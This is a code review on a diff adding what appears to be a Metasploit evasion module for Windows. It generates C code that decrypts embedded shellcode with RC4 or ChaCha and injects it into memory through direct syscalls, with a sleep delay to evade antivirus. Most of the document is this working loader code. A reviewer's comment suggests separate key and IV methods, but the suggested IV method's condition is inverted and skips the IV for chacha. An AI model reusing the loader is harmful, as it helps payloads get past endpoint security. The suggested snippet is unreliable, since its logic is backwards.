modules/evasion/windows/syscall_inject.rb

```diff
@@ -0,0 +1,574 @@
+                    Entries[j + 1].Address = TempEntry.Address;
+                }
+            }
+        }
+
+        return TRUE;
+    }
+
+    extern DWORD GetSyscallNumber(DWORD FunctionHash)
+    {
+        if (!PopulateSyscallList()) return -1;
+        for (DWORD i = 0; i < _SyscallList.Count; i++)
+        {
+            if (FunctionHash == _SyscallList.Entries[i].Hash)
+            {
+                return i;
+            }
+        }
+        return -1;
+    }
+    @
+  end
+
+  def exec_func
+    %^
+        #{get_payload}
+        DWORD exec(void *buffer)
+        {
+            void (*function)();
+            function = (void (*)())buffer;
+            function();
+        }
+        ^
+  end
+
+  def inject
+    s = "int i; for(i=0;i<10;i++){Sleep(#{datastore['SLEEP']} / 10);}"
+    @inject = %@
+
+        void inject()
+        {
+            HANDLE pHandle;
+            DWORD old = 0;
+            CLIENT_ID cID = {0};
+            OBJECT_ATTRIBUTES OA = {0};
+            SIZE_T size = sizeof(shellcode);
+            PVOID bAddress = NULL;
+            int process_id = GetCurrentProcessId();
+            cID.UniqueProcess = process_id;
+            NtOpenProcess(&pHandle, PROCESS_ALL_ACCESS, &OA, &cID);
+            NtAllocateVirtualMemory(pHandle, &bAddress, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+            int n = 0;
+            PBYTE temp = (char*)malloc(sizeof(shellcode));
+            @
+    if datastore['CIPHER'] == 'rc4'
+      @inject << %@
+            #{Rex::Text.to_c key, Rex::Text::DefaultWrap, 'key'}
+            RC4(key, shellcode, temp, sizeof(shellcode));
+            NtWriteVirtualMemory(pHandle, bAddress, temp, size, NULL);
+            @
+    else
+      @inject << %@
+            #{Rex::Text.to_c key[:key], Rex::Text::DefaultWrap, 'key'}
+            #{Rex::Text.to_c key[:iv], Rex::Text::DefaultWrap, 'iv'}
+            chacha_ctx ctx;
+            chacha_keysetup(&ctx, key, 256, 96);
+            chacha_ivsetup(&ctx, iv);
+            chacha_encrypt_bytes(&ctx, shellcode, temp, sizeof(shellcode));
+            NtWriteVirtualMemory(pHandle, bAddress, temp, size, NULL);
+            @
+    end
+    @inject << %@
+            NtProtectVirtualMemory(pHandle, &bAddress, &size, PAGE_EXECUTE, &old);
+            #{s if datastore['SLEEP'] > 0};
+            HANDLE thread = NULL;
+            NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, NULL, NULL, NULL, NULL, NULL);
+            WaitForSingleObject(thread, INFINITE);
+            NtClose(thread);
+            NtClose(pHandle);
+        }
+        @
+  end
+
+  def main
+    %^
+        int main()
+        {
+            inject();
+        }
+        ^
+  end
+
+  def key
+    if datastore['CIPHER'] == 'rc4'
+      @key ||= Rex::Text.rand_text_alpha(32..64)
+    else
+      @key ||= Rex::Text.rand_text(32)
+      @iv ||= Rex::Text.rand_text(12)
+      return { iv: @iv, key: @key }
+    end
+  end
```

Comment:
The return value should really always be the same (or `nil`), ie always a string or always a hash. For this I think it would make more sense to add a `iv` method that would generate the initialization vector depending on the cipher as you do here for the key.

Something like:
```suggestion
  def key
    if datastore['CIPHER'] == 'rc4'
      @key ||= Rex::Text.rand_text_alpha(32..64)
    else
      @key ||= Rex::Text.rand_text(32)
    end
  end
  
  def iv
    unless datastore['CIPHER'] == 'chacha'
      @iv ||= Rex::Text.rand_text(12)
    end
  end
```